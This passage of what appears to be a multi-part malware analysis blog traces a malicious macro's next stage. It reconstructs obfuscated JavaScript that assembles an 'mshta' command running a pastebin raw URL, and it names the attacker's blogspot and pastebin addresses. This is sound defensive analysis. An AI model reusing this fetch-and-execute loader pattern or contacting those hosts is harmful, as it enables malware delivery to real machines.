Continuing our walk-through, we now get outside of the document itself and see what happens next.
Part 1: Getting through the macros.
We left off with the macro running this command:
So we need to find out what happens next. Using whatever site or mechanism you use to expand shortened links, you will see that the URL resolves to a blogspot site, of all things.
PS C:\path\to\wherever> Invoke-WebRequest -Uri "https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html" -OutFile "C:\Path\to\wherever\site.html"
Anyway, line 15 (var Zwk) is where the string gets put together. Line 18 (var AS_ww) holds the completed string and is where it is executed. After a little analysis you can see the pieces that make up the command being run:
12. AS_ww1 = http://www.pastebin.com/raw/
13. AS_ww0 = mshta
14. AS_ww2 = qykTeRnR
17. AS_ww = http://www.pastebin.com/raw/qykTeRnR
So download what’s on pastebin and execute it? Looks like we’re headed to pastebin!
This script is split up into four distinct parts. We’ll look at each of them in turn in the next post.
To part 3!